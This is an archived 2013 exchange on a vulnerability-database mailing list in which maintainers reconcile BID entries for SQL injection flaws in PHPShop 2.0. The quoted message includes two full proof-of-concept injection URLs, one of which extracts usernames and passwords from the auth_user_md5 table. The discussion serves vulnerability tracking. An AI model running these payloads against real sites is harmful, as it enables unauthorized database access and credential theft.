[VIM] PHPShop CMS Multiple SQL Injection Vulnerabilities
Narayan Agarwalla
Narayan_Agarwalla at symantec.com
Wed Jan 16 11:59:49 CST 2013
Hi George,
BID 37227: Information regarding 'product_id' and 'module_id' parameters moved to BID 27570 and BID 57320.
BID 27570: phpshop 2.0 added as vulnerable
BID 57320: Information regarding 'product_id' moved to BID 27570
Thanks and Regards,
Narayan
-----Original Message-----
From: vim-bounces at attrition.org [mailto:vim-bounces at attrition.org] On Behalf Of George A. Theall
Sent: Wednesday, January 16, 2013 6:13 PM
To: Vulnerability Information Managers
Subject: [VIM] PHPShop CMS Multiple SQL Injection Vulnerabilities
BID 57320 was created yesterday for the SQL injections reported in EDB-ID 24108:
http://localhost/phpshop 2.0/?page=admin/function_list&module_id=11' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
These are among the issues reported in http://archives.neohapsis.com/archives/bugtraq/2009-12/0099.html and covered already by BID 37227
And the shop/flypage one was also reported earlier in http://archives.neohapsis.com/archives/bugtraq/2008-02/0014.html and is covered by BID 27570
Rob / Venkat?
George
--
theall at tenable.com
More information about the VIM
mailing list